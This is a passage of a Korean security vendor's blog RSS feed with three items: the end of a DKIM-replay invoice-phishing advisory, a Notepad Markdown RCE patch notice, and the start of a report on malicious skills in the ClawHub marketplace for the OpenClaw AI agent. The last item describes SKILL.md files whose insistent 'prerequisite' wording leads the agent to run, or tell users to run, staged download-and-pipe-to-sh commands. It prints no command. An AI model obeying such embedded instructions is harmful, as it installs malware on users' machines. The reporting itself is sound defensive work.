&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;▪︎&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;결제 취소, 구독 해지, 무단 결제 알림, 계정 잠금 해제 안내 등 민감한 알림 메일을 받았을 때는, 메일에 적힌 전화번호나 링크를 절대 그대로 사용하지 말고, 브라우저나 공식 앱에서 주소를 직접 입력해 접속해야 합니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;▪︎&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;PayPal의 경우 직접 &lt;i&gt;&lt;span style=&quot;background-color: #dddddd;&quot;&gt;paypal.com&lt;/span&gt;&lt;/i&gt;에 접속해 로그인 후 활동 내역(Activity)&amp;middot;Resolution Center에서 동일 알림이 존재하는지 확인하고, 존재하지 않는다면 피싱으로 의심해야 합니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;▪︎&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;애플 역시 &lt;i&gt;&lt;span style=&quot;background-color: #dddddd;&quot;&gt;appleid.apple.com&lt;/span&gt;&lt;/i&gt; 또는 공식 앱스토어/구독 관리 화면을 통해 결제 내역과 구독 상태를 확인하는 습관을 들여야 합니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;3) &lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;추가 정보 요구 시 즉시 의심하기&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;▪︎&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;전화 상담 중 카드 전체 번호, CVC, 일회용 인증번호, 계정 비밀번호, 보안 질문 답변 등을 요구한다면, 즉시 통화를 종료하고 공식 채널로 다시 확인해야 합니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;▪︎&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;실제 애플&amp;middot;페이팔&amp;middot;은행 등은 전화나 이메일을 통해 비밀번호나 전체 카드 번호를 요구하지 않는다는 점을 반복적으로 교육해야 합니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;애플&amp;middot;페이팔 인보이스 기능을 악용한 DKIM 리플레이 기반 송장 피싱은, 전통적인 &amp;lsquo;도메인 위조 메일&amp;rsquo;과는 다른 차원의 위협입니다. 발신 도메인과 템플릿, DKIM&amp;middot;DMARC까지 모두 정상처럼 보이기 때문에, 이제는 '메일이 진짜냐 가짜냐'를 넘어서 '내용&amp;middot;행동 요청이 합리적인가, 검증 가능한 공식 경로를 통해 재확인했는가'를 기준으로 판단해야 합니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;조직과 개인 모두, 이메일 인증 기술을 절대적인 안전 장치로 과신하기보다, 기술&amp;middot;정책&amp;middot;사용자 인식이 결합된 다층적인 방어 전략을 통해 이런 유형의 공격에 대비해야 합니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif; color: #666666;&quot;&gt;&lt;b&gt;[참고 출처]&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;a href=&quot;https://cybersecuritynews.com/legitimate-apple-and-paypal-invoice-emails/&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;Hackers Exploit Legitimate Apple and PayPal Invoice Emails in DKIM Replay Attacks&lt;/a&gt; &amp;ndash; Cyber Security News&lt;/li&gt;
&lt;/ul&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>이스트시큐리티 소식</category>
      <category>dkim</category>
      <category>DKIM리플레이공격</category>
      <category>결제피싱</category>
      <category>사회공학공격</category>
      <category>송장피싱</category>
      <category>애플피싱메일</category>
      <category>이메일보안</category>
      <category>이메일피싱</category>
      <category>인보이스피싱</category>
      <category>페이팔피싱</category>
      <author>알약5</author>
      <guid isPermaLink="true">https://alyacofficialblog.tistory.com/5729</guid>
      <comments>https://alyacofficialblog.tistory.com/5729#entry5729comment</comments>
      <pubDate>Tue, 24 Feb 2026 14:45:25 +0900</pubDate>
    </item>
    <item>
      <title>Windows 메모장 원격 코드 실행(RCE) 취약점 업데이트 권고(CVE-2026-20841)</title>
      <link>https://alyacofficialblog.tistory.com/5727</link>
      <description>&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;692&quot; data-origin-height=&quot;440&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bUO7Bw/dJMcagdoebJ/13204HwAG7oEiyxG7vINPk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bUO7Bw/dJMcagdoebJ/13204HwAG7oEiyxG7vINPk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bUO7Bw/dJMcagdoebJ/13204HwAG7oEiyxG7vINPk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbUO7Bw%2FdJMcagdoebJ%2F13204HwAG7oEiyxG7vINPk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;692&quot; height=&quot;440&quot; data-origin-width=&quot;692&quot; data-origin-height=&quot;440&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;Windows&lt;/span&gt;용&lt;span&gt; '&lt;/span&gt;메모장&lt;span&gt;(Notepad)' &lt;/span&gt;앱에서 원격 코드 실행&lt;span&gt;(RCE) &lt;/span&gt;취약점이 발견되었습니다&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;이번 취약점은 최신 메모장 앱에 추가된&lt;span&gt; '&lt;/span&gt;마크다운&lt;span&gt;(Markdown) &lt;/span&gt;렌더링&lt;span&gt;' &lt;/span&gt;기능의 허점을 악용한 것입니다&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;공격자가 특수하게 조작한 링크가 담긴 마크다운&lt;span&gt;(.md) &lt;/span&gt;파일을 메모장으로 열고 클릭할 경우&lt;span&gt;, &lt;/span&gt;윈도우의 별도 보안 시스템 경고 없이 공격자의 원격 서버에 있는 악성 파일이 즉시 실행될 수 있습니다&lt;span&gt;. &lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;현재 공격을 증명하는 코드&lt;span&gt;(PoC)&lt;/span&gt;가 공개되어 있어 실제 피해로 이어질 가능성이 높으므로 사용자분들의 신속한 업데이트가 필요합니다&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span&gt;CVE &lt;/span&gt;번호&lt;/b&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;b&gt;&lt;span&gt;CVE-2026-20841 &lt;/span&gt;&lt;/b&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;영향 받는 버전&lt;/b&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span&gt;Microsoft Store &lt;/span&gt;배포 메모장 앱&lt;span&gt; v11.0.0 &lt;/span&gt;이상&lt;span&gt; ~ v11.2510 &lt;/span&gt;미만&amp;nbsp;&lt;/b&gt;&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;Windows 11: 기본 메모장이 Store버전으로 대부분 해당&lt;/li&gt;
&lt;li&gt;Windows 10: 기본 메모장이 레거시 버전(notepad.exe)으로 Microsoft Store에서 메모장 앱을 별도로 설치한 경우에만 해당&lt;/li&gt;
&lt;/ul&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;※ &lt;/span&gt;&lt;span&gt;시스템 기본 폴더에 위치한 구버전&lt;span&gt; '&lt;/span&gt;레거시 메모장&lt;span&gt;(Notepad.exe)'&lt;/span&gt;은 마크다운 기능이 없어 이번 취약점에 해당되지 않습니다&lt;span&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;패치 방법&lt;/b&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;메모장 앱&lt;/b&gt; &lt;b&gt;&lt;span&gt;v11.2510 &lt;/span&gt;&lt;span&gt;이상으로 업데이트&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;[Microsoft Store] 앱 실행 &amp;gt; 좌측 하단 [다운로드] &amp;gt; [업데이트 확인]클릭, 메모장앱 최신버전으로 업데이트&lt;/li&gt;
&lt;/ul&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;참고&lt;span&gt;:&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;&lt;a href=&quot;https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841&quot;&gt;https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;&lt;a href=&quot;https://nvd.nist.gov/vuln/detail/CVE-2026-20841&quot;&gt;https://nvd.nist.gov/vuln/detail/CVE-2026-20841&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;a href=&quot;https://www.boho.or.kr/kr/bbs/view.do?searchCnd=&amp;amp;bbsId=B0000133&amp;amp;searchWrd=&amp;amp;menuNo=205020&amp;amp;pageIndex=1&amp;amp;categoryCode=&amp;amp;nttId=71968&quot; target=&quot;_blank&quot; rel=&quot;noopener&amp;nbsp;noreferrer&quot;&gt;https://www.boho.or.kr/kr/bbs/view.do?searchCnd=&amp;amp;bbsId=B0000133&amp;amp;searchWrd=&amp;amp;menuNo=205020&amp;amp;pageIndex=1&amp;amp;categoryCode=&amp;amp;nttId=71968&lt;/a&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;400&quot; data-origin-height=&quot;150&quot;&gt;&lt;a href=&quot;https://www.estsecurity.com/&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/RjQL8/dJMcahDktpb/C4kz80VwWnXAp8XlRkzv3k/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FRjQL8%2FdJMcahDktpb%2FC4kz80VwWnXAp8XlRkzv3k%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;400&quot; height=&quot;150&quot; data-origin-width=&quot;400&quot; data-origin-height=&quot;150&quot;/&gt;&lt;/a&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>국내외 보안동향</category>
      <author>알약4</author>
      <guid isPermaLink="true">https://alyacofficialblog.tistory.com/5727</guid>
      <comments>https://alyacofficialblog.tistory.com/5727#entry5727comment</comments>
      <pubDate>Fri, 13 Feb 2026 10:48:43 +0900</pubDate>
    </item>
    <item>
      <title>AI 에이전트 확장 마켓플레이스 ClawHub, 대규모 공급망 공격 발생</title>
      <link>https://alyacofficialblog.tistory.com/5726</link>
      <description>&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;4000&quot; data-origin-height=&quot;2242&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/y04aH/dJMcagj7GWX/BGw2yeKjSeXfEaJv19OmO1/img.jpg&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/y04aH/dJMcagj7GWX/BGw2yeKjSeXfEaJv19OmO1/img.jpg&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/y04aH/dJMcagj7GWX/BGw2yeKjSeXfEaJv19OmO1/img.jpg&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fy04aH%2FdJMcagj7GWX%2FBGw2yeKjSeXfEaJv19OmO1%2Fimg.jpg&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;4000&quot; height=&quot;2242&quot; data-origin-width=&quot;4000&quot; data-origin-height=&quot;2242&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;세계적으로 많은 관심을 받고 있는&lt;span&gt; AI &lt;/span&gt;에이전트&lt;span&gt; OpenClaw&lt;/span&gt;의 공식 플러그인 마켓플레이스인&lt;span&gt; ClawHub&lt;/span&gt;에서 공급망 공격이 발생했습니다&lt;span&gt;. &lt;/span&gt;해당 공격을 보고한 보안 업체의 조사 결과에 따르면 전체&lt;span&gt; 2,857&lt;/span&gt;개의 스킬 중 약&lt;span&gt; 341&lt;/span&gt;개 이상이 악성으로 확인되었습니다&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;이번 사건은&lt;span&gt; AI &lt;/span&gt;에이전트의 생태계가 폭발적으로 확산됨에 따라 공격 대상이 될 수 있음을 보여준 사례입니다&lt;span&gt;.&lt;/span&gt;&lt;span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;div style=&quot;background-color: #f8f9fa; border-left: 5px solid #dee2e6; padding: 15px 20px; margin: 20px 0; color: #495057;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span&gt;OpenClaw&lt;/span&gt;와&lt;span&gt; ClawHub &lt;/span&gt;란&lt;span&gt;?&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;OpenClaw&lt;/span&gt;는 사용자의 로컬 환경에서 구동되는&lt;span&gt; AI &lt;/span&gt;에이전트로&lt;span&gt;, &lt;/span&gt;캘린더 관리&lt;span&gt;, &lt;/span&gt;통신 플랫폼 명령 등 다양한 자동화 작업을 수행합니다&lt;span&gt;. &lt;/span&gt;기능 확장은 사용자 또는 외부 개발자가 만든&lt;span&gt; '&lt;/span&gt;스킬&lt;span&gt;(Skill)'&lt;/span&gt;이라는 플러그인 형태로 제공되며&lt;span&gt;, ClawHub&lt;/span&gt;는 이러한 스킬을 배포하고 설치할 수 있는 허브&lt;span&gt;(&lt;/span&gt;레지스트리&lt;span&gt;)&lt;/span&gt;입니다&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&amp;nbsp;&lt;/h3&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;공격 방식 요약&lt;/b&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span&gt;1. &lt;/span&gt;스킬 업로드 체계의 허점&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;ClawHub&lt;/span&gt;는 스킬 업로드 과정에서 충분한 코드 리뷰를 진행하지 않았으며&lt;span&gt;, &lt;/span&gt;업로더에 대한 인증도 미흡했습니다&lt;span&gt;. &lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;이로 인해 악성 스킬이 공식 저장소에 손쉽게 등록될 수 있었습니다&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1185&quot; data-origin-height=&quot;836&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/IzYFW/dJMcacPz0xa/wJuAK61fHb5kGSgosfTdd0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/IzYFW/dJMcacPz0xa/wJuAK61fHb5kGSgosfTdd0/img.png&quot; data-alt=&quot;[그림 1 ] 공격자 계정에 업로드 된 악성 스킬&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/IzYFW/dJMcacPz0xa/wJuAK61fHb5kGSgosfTdd0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FIzYFW%2FdJMcacPz0xa%2FwJuAK61fHb5kGSgosfTdd0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1185&quot; height=&quot;836&quot; data-origin-width=&quot;1185&quot; data-origin-height=&quot;836&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;[그림 1 ] 공격자 계정에 업로드 된 악성 스킬&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span&gt;2. &lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span&gt;에이전트 조작 공학&lt;span&gt;(Agent Engineering)&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;기존의 사회공학&lt;span&gt;(Social Engineering)&lt;/span&gt;이 사람의 심리를 이용해 행동을 유도하는 기법이라면&lt;span&gt;, &lt;/span&gt;이번 공격은&lt;span&gt; AI &lt;/span&gt;에이전트의 지시 해석 구조를 이용해 명령 실행을 유도하는 기법으로&lt;span&gt;, &lt;/span&gt;이를&lt;span&gt; '&lt;/span&gt;에이전트 조작 공학&lt;span&gt;(Agent Engineering)'&lt;/span&gt;이라 부를 수 있습니다&lt;span&gt;. &lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;공격자는&lt;span&gt; SKILL.md &lt;/span&gt;파일의 경고 이모지와 함께&lt;span&gt; &quot;Prerequisites&quot; &lt;/span&gt;섹션에&lt;span&gt; &quot;IMPORTANT&quot;, &quot;required&quot; &lt;/span&gt;등 강한 어조의 지침을 삽입하여&lt;span&gt;, AI &lt;/span&gt;에이전트가 이를 필수 설치 절차로 해석하고 사용자에게 외부 명령 실행을 안내하거나 직접 실행하도록 유도했습니다&lt;span&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1161&quot; data-origin-height=&quot;796&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/L2Y9u/dJMcab4bCgU/3wZBfgWJreSub4NvHrziLk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/L2Y9u/dJMcab4bCgU/3wZBfgWJreSub4NvHrziLk/img.png&quot; data-alt=&quot;[그림 2] 악성 SKILL.md 파일 화면&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/L2Y9u/dJMcab4bCgU/3wZBfgWJreSub4NvHrziLk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FL2Y9u%2FdJMcab4bCgU%2F3wZBfgWJreSub4NvHrziLk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1161&quot; height=&quot;796&quot; data-origin-width=&quot;1161&quot; data-origin-height=&quot;796&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;[그림 2] 악성 SKILL.md 파일 화면&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span&gt;3. &lt;/span&gt;확장 설치 절차를 이용한 간접 명령 실행 - &lt;/b&gt;&lt;b&gt;다단계 페이로드 전달(Multi-stage Delivery)&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;실제 악성 코드 실행은 기존 악성코드 유포와 동일한 탐지 회피 구조를 따릅니다&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;SKILL.md&lt;/span&gt;의 안내에 따라 외부 사이트에 접속하면&lt;span&gt;, &lt;/span&gt;인코딩된 명령이 디코딩되어 내부 명령어로 스크립트를 다운로드하고&lt;span&gt;, &lt;/span&gt;파이프라인&lt;span&gt;(|sh)&lt;/span&gt;을 통해 추가 페이로드를 실행합니다&lt;span&gt;. &lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;ClawHub&lt;/span&gt;에 업로드된 스킬 파일 자체에는 악성 코드가 포함되지 않아&lt;span&gt;, &lt;/span&gt;기존 분석만으로는 탐지가 어려운 구조입니다&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
